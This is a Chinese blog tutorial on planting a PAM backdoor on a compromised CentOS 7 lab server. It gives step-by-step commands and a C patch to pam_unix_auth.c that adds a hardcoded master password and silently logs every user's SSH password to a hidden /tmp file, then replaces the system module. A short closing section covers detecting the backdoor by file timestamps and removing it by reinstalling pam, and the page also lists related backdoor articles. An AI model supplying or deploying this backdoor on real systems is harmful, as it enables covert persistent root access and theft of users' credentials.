LINUX留后门--教程(六)—— PAM后门

最新推荐文章于 2024-04-02 17:12:52 发布
最新推荐文章于 2024-04-02 17:12:52 发布
阅读量5.2k 收藏 19
点赞数 2
分类专栏: # 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/118728788
版权

一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、PAM后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
靶机 IP: 192.168.160.144 (centos7)
攻击IP: 192.168.160.1 (win10 xhell)

2.1 pam介绍

在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过自行撰写的程序来判断该账号口令是否正确。也因为如此,我们常常得使用不同的机制来判断账号口令, 所以搞的一部主机上面拥有多个各别的认证系统,也造成账号口令可能不同步的验证问题! 为了解决这个问题因此有了 PAM (Pluggable Authentication Modules, 嵌入式模块) 的机制!

PAM 可以说是一套应用程序编程接口 (Application Programming Interface, API),他提供了一连串的验证机制,只要使用者将验证阶段的需求告知 PAM 后, PAM 就能够回报使用者验证的结果 (成功或失败)。由于 PAM 仅是一套验证的机制,又可以提供给其他程序所呼叫引用,因此不论你使用什么程序,都可以使用 PAM 来进行验证,如此一来,就能够让账号口令或者是其他方式的验证具有一致的结果!也让程序设计师方便处理验证的问题。

从pam的介绍中,我们知道,其实登录系统的时候,是pam的模块来验证我们的密码是否正确的。所以就存在这样一种可能,修改pam的验证逻辑,来达到一定条件下不去跟shadow里的密码校验,而是直接返回验证正确,从而达到作为后门的目的。(借用大佬的介绍不写了。)

2.2 植入 PAM 后门

第一步:
在 centos7 环境下,首先需要关闭 selinux 和临时关闭 setenforce 0。

setenforce 0

在这里插入图片描述
在这里插入图片描述
第二步:查看 pam 版本号

发现是 1.1.8 版本

rpm -qa|grep pam

在这里插入图片描述
第三步:下载对应版本的 pam 源码包

pam下载地址:http://www.linux-pam.org/library/
选择 pam1.1.8

wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

在这里插入图片描述
解压 PAM tar包

tar -zxvf Linux-PAM-1.1.8

在这里插入图片描述
第四步:安装gcc编译器和flex库

yum install gcc flex flex-devel -y

在这里插入图片描述
第五步:留 PAM 后门和保存 ssh登录的账户密码

修改 Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c 源码实现自定义密码认证和保存登录密码

if(strcmp("fuckyou",p)==0){return PAM_SUCCESS;}
        if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");    
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);}

在这里插入图片描述
第六步:编译

cd ..
cd ..
./configure

在这里插入图片描述

make

在这里插入图片描述
第七步:备份原有的 pam_unix.so
防止出现错误 ssh 登录不上了

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp

在这里插入图片描述
第八步:复制新 PAM 模块到 /lib64/security/ 目录下:

cp /Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

在这里插入图片描述
第九步:登录测试

本地登录测试

ssh root@127.0.0.1

在这里插入图片描述
远程登录测试
在这里插入图片描述
查看 ssh 登录账号密码保存位置,root 账户的密码被成功保存

ls -a
cat .sshlog

在这里插入图片描述

三、PAM 后门——应急响应发现

第一步:查看可以连接

natstat -anpt

在这里插入图片描述

第二步:检查pam_unix.so的修改时间

因为 pam 后门是替换文件,所以查看文件的修改时间,如果为最近的时间就是被替换了。(没有可以连接的时候也可以查看)

stat /lib/security/pam_unix.so      #32位
stat /lib64/security/pam_unix.so    #64位

如图所示,时间就是最近的时间,有问题。
在这里插入图片描述
第三步:清除 pam 后门

yum reinstall pam

在这里插入图片描述
再次 xhell 连接,提示登录不成功,后门被清除
在这里插入图片描述
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

W小哥1
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
Linux-PAM-1.1.8.tar.bz2下载
07-18
linux pam源码
Linux-PAM的分析与应用.pdf
09-06
Linux-PAM的分析与应用.pdf
应急响应实战笔记——权限维持篇:④ Linux权限维持&后门
最新发布
君逍遥o
04-02 846
首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。如果匹配成功就可以登录了。
PAM机制
Micheal
04-18 6835
一.PAM简介 Linux-PAM(linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式.  换句话说,不用(重新编写和)重新编译一个包含PAM功能的应用程序,就可以改变它使用的认证机制.  这种方式下,就算升级本地认证机制,也不用修改程序.  PAM使用配置文件/etc/pam.conf(或/etc/pam.d/下的文件),来管理对程序的认证
Linux高级安全认证Linux-PAM的配置
06-12 1万+
导读:PAM机制是一个非常成熟的安全认证机制,可以为Linux多种应用提供安全、可靠的认证服务。本文将对PAM机制的原理、配置进行详细介绍。 关键词:Linux-PAM配置 PAM机制原理 嵌入式认证模块 配置语法  Linux系统是一个多用户、多进程的操作系统,并且,它提供了众多的系统和网络服务给用户使用。因此,从应用角度来说,它不可避免地需要对大量的应用及其用户进行安全认证,只
linux-pam 编译,PAM后门编译安装
weixin_39879665的博客
05-06 1292
PAM有许多版本,我们首先要从官方下载目标所使用的PAM源码包,并在本地修改后编译生成出pam_unix.so文件进行替换http://www.linux-pam.org/library/https://fedorahosted.org/releases/l/i/linux-pam/获取目标系统所使用的PAM版本:rpm-qa|greppam下载后,在对应的系统环境下(32或x86_64位系统...
Linux-PAM-1.3.0.tar.gz_PAM_linux_pam 1.3.1
09-23
Linux-Pam-1.3.0.tar.gz is a package for installing PAM.
linux上的PAM后门理解与学习
Shanfenglan's blog
09-09 1231
文章目录1. 什么是PAM2. 读懂PAM配置文件 1. 什么是PAM 全称为Pluggable Authentication Modules,是一种身份认证机制。直译是可插入的身份验证模块。 简单理解为,应用程序可以调用PAM给的接口来进行身份验证而不用自己去写详细的身份验证模块,将身份验证端于服务端分离,根据返回值来决定验证是否通过进而是否提供服务,具体验证规则取决于自定义的配置文件,也就是/etc/pam.d/下的配置文件,例如sshd服务的配置文件就为/etc/pam.d/sshd。 2. 读懂P
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1238
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 1916
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
linuxpam验证
hao18692659499的博客
04-13 5908
PAM:可插拔的认证模块 模块  /lib/security 接口配置文件  /etc/pam.d/ type auth  验证是否有该帐号 account  口令 帐号是否过期 password  用户修改口令 session   会话过程 control required    必须通过,           如果没有通过 ,测底否定  ,而且还要看后续模块
Linux——PAM-的应用开发和内部实现源码分析
11-16
Linux——PAM-的应用开发和内部实现源码分析,介绍了如何利用PAM模块编程进行对Linux操作系统安全访问。
pam.tar.gz_linux pam _linux-pam
09-24
PAM的介绍资料,如何使用Linux下的加密机制等。
sshd登录问题: pam_unix(sshd:session): session closed for user root
热门推荐
weixin_43570089的博客
08-20 3万+
报错: pam_unix(sshd:session): session closed for user root 工位上使用ssh无法root登录(其他账户也一样)。 1、踢账户(反复发作) who pkill -kill -t pts/1 who 2、 期间重启过网卡问题没解决,最后解决办法重启网络(呵呵)。 linux下ssh登陆日志文件secure分析(相关连接) https://www.i...
linux pam 解锁_Linux系统安全之pam后门安装使用详解
weixin_33324399的博客
12-24 546
一.查看系统pam版本:[root@redkey ~]# rpm -qa | grep pampam-1.1.1-4.el6.x86_64二.下载对应版本的pam模块http://www.linux-pam.org/library/三.解压&修改pam_unix_auth.c文件tar -xzvf Linux-PAM-1.1.1.tar.gzcd Linux-PAM-1.1.1cd mod...
Linux设定密码策略
woailyoo0000的博客
01-17 2万+
先讲怎么使用,后面有理论教程,先知其然再知其所以然 1. 禁止使用旧密码 vi /etc/pam.d/system-auth 找到同时有 “password” 和 “pam_unix.so” 字段并且附加有 “remember=5” 的那行,它表示禁止使用最近用过的5个密码(己使用过的密码会被保存在 /etc/security/opasswd 下面)。 password sufficien...
Linux--PAM机制
TYJhhxx的博客
06-26 3000
一、PAM是什么? 二、PAM模块设置语法 2.1 /etc/pam.d/里面的配置文件 2.1.1第一个字段:验证类别(Type) 2.1.2第二个字段:验证的控制标识(control flag) 三、常用模块简介 总结
系统是否有后门Linux安全加固之PAM知多少
jiangzhuwanshi2008的博客
02-16 1957
前言Linux在新装的系统中,更改用户的密码时可能会遇到以下报错:BAD PASSWORD: The password fails the dictionary check - it is based on a dictionary word这是由于系统会对新密码进行检查,如果系统觉得新密码过于简单或不安全,系统就会报错。如果想继续使用简单的密码,通常可以通过更改/etc/pam.d/sysyst...
Linuxpam模块详解
Linux知识积累
07-24 1万+
pam简介 Linux-PAM(linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式。换句话说,不用重新编译一个包含PAM功能的应用程序,就...
linux-pam-1.3.1.tar.xz下载
12-08
您可以在官方网站或者其他可信赖的软件下载网站上找到linux-pam-1.3.1.tar.xz的下载链接。您可以使用浏览器或者命令行工具来进行下载。在浏览器中,您可以直接在搜索引擎中搜索“linux-pam-1.3.1.tar.xz下载”,然后选择一个官方或者可信赖的网站进行下载。在命令行中,您可以使用wget或者curl命令来下载文件,例如: ```bash wget https://example.com/linux-pam-1.3.1.tar.xz ``` 下载完成后,您可以使用文件管理器或者命令行工具来解压缩这个文件。在命令行中,您可以使用tar命令来进行解压缩,例如: ```bash tar -xvf linux-pam-1.3.1.tar.xz ``` 解压缩完成后,您可以查看文件中的内容,并根据需要进行配置、编译和安装。一般来说,您可以在解压后的文件夹中找到相关的安装说明和文档,按照这些说明进行操作即可。需要注意的是,根据实际情况可能需要在安装过程中输入相关的管理员密码或者确认操作。 总之,下载linux-pam-1.3.1.tar.xz文件并不难,只需要找到合适的下载链接并按照相关的步骤进行操作即可。希望这能帮助到您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值